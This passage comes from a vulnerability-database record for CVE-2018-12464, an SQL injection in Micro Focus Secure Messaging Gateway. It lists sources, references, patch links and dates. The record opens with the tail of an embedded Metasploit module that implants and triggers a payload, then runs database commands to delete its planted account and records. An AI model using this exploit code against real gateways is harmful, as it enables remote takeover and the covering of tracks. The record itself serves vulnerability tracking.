\u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-122426",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464",
        "trust": 2.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45083",
        "trust": 2.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "106343",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "148758",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "id": "VAR-201806-1215",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ],
    "trust": 0.85
  },
  "last_update_date": "2023-12-18T13:24:05.129000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Critical SQL Injection Vulnerability in SMG (CVE-2018-12464)",
        "trust": 0.8,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "title": "Micro Focus Secure Messaging Gateway Web administration  and quarantine Component SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81644"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
      },
      {
        "trust": 2.0,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/45083/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12464"
      },
      {
        "trust": 0.3,
        "url": "https://www.exploit-db.com/exploits/45083"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com/products/secure-messaging-gateway/"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com"
      },
      {
        "trust": 0.1,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2018-07-31T14:49:49",
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "date": "2018-06-29T16:29:00.277000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "date": "2018-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2023-11-07T02:52:14.760000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Micro Focus Secure Messaging Gateway In  SQL Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "sql injection",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.7
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2018-12464 (GCVE-0-2018-12464)

CNVD-2018-12540

GHSA-QX98-CWXC-VRV6

FKIE_CVE-2018-12464

GSD-2018-12464

VAR-201806-1215

Tags

Sightings

Nomenclature